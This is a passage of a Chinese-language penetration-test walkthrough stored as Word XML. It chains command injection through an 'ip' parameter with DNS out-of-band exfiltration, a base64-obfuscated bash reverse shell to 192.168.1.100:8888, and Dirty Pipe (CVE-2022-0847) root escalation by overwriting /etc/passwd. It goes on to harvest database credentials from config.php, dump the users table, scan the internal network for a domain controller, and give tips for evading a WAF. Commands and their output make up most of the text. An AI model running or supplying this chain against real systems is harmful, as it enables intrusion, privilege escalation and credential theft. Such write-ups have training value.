        <w:t># 攻击者启动监听</w:t>
        <w:br/>
        <w:t>interactsh-client</w:t>
        <w:br/>
        <w:t># 返回域名: abc123.oast.site</w:t>
        <w:br/>
        <w:br/>
        <w:t># 目标执行 DNS 请求</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; curl http://$(whoami).abc123.oast.site</w:t>
        <w:br/>
        <w:br/>
        <w:t># 攻击者收到 DNS 请求</w:t>
        <w:br/>
        <w:t># [DNS] Received: www-data.abc123.oast.site -&gt; 确认命令执行成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**反弹 Shell**：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># 攻击者监听</w:t>
        <w:br/>
        <w:t>nc -lvnp 8888</w:t>
        <w:br/>
        <w:br/>
        <w:t># Payload（Base64 编码绕过）</w:t>
        <w:br/>
        <w:t>ip=127.0.0.1; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzg4ODggMD4mMQ== | base64 -d | bash</w:t>
        <w:br/>
        <w:br/>
        <w:t># 收到反弹 Shell</w:t>
        <w:br/>
        <w:t>Connection from 192.168.1.100:8888</w:t>
        <w:br/>
        <w:t>$ id</w:t>
        <w:br/>
        <w:t>uid=33(www-data) gid=33(www-data) groups=33(www-data)</w:t>
        <w:br/>
        <w:t>$ whoami</w:t>
        <w:br/>
        <w:t>www-data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>阶段三：权限提升</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># 查看系统信息</w:t>
        <w:br/>
        <w:t>$ uname -a</w:t>
        <w:br/>
        <w:t>Linux web01 5.10.0-20-amd64 #1 SMP Debian 5.10.113-1 (2022-04-29) x86_64</w:t>
        <w:br/>
        <w:br/>
        <w:t># 搜索漏洞</w:t>
        <w:br/>
        <w:t>$ searchsploit linux 5.10 debian | grep -i "privilege escalation"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Dirty Pipe (CVE-2022-0847)</w:t>
        <w:br/>
        <w:t>$ gcc -o dirtypipe dirtypipe.c -lpthread</w:t>
        <w:br/>
        <w:t>$ ./dirtypipe /etc/passwd</w:t>
        <w:br/>
        <w:t># 成功覆盖 root 密码哈希 -&gt; su root</w:t>
        <w:br/>
        <w:br/>
        <w:t># 提权成功</w:t>
        <w:br/>
        <w:t># id</w:t>
        <w:br/>
        <w:t>uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>阶段四：后渗透</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t># 查看数据库配置</w:t>
        <w:br/>
        <w:t>$ cat /var/www/html/config.php</w:t>
        <w:br/>
        <w:t>define('DB_HOST', 'localhost');</w:t>
        <w:br/>
        <w:t>define('DB_USER', 'webuser');</w:t>
        <w:br/>
        <w:t>define('DB_PASS', 'P@ssw0rd123');</w:t>
        <w:br/>
        <w:t>define('DB_NAME', 'webapp');</w:t>
        <w:br/>
        <w:br/>
        <w:t># 连接数据库</w:t>
        <w:br/>
        <w:t>$ mysql -u webuser -p'P@ssw0rd123' webapp -e "SELECT * FROM users;"</w:t>
        <w:br/>
        <w:br/>
        <w:t># 内网横向扫描</w:t>
        <w:br/>
        <w:t>$ nmap -sn 192.168.1.0/24</w:t>
        <w:br/>
        <w:t>Nmap scan report for 192.168.1.10</w:t>
        <w:br/>
        <w:t>Host is up (0.0012s latency).</w:t>
        <w:br/>
        <w:t>Nmap scan report for 192.168.1.20 (DC)</w:t>
        <w:br/>
        <w:t>Host is up (0.0015s latency).</w:t>
        <w:br/>
        <w:br/>
        <w:t># 发现域控，尝试横向移动...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>阶段五：总结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宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>阶段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b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>用时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b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>关键命令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b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发现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5分钟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`;sleep 5`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利用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10分钟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`nc -lvnp` + `base64 echo \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bash`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提权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15分钟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Dirty Pipe CVE-2022-0847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后渗透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30分钟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  <w:t>`cat config.php` + `nmap`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2351"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[!] **关键经验**：先外带确认再反弹 Shell 避免被 WAF 阻断；提权前先查内核版本对 CVE 表；数据库配置文件中能找到内网横向的突破口。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00408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0056B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0070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/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="333333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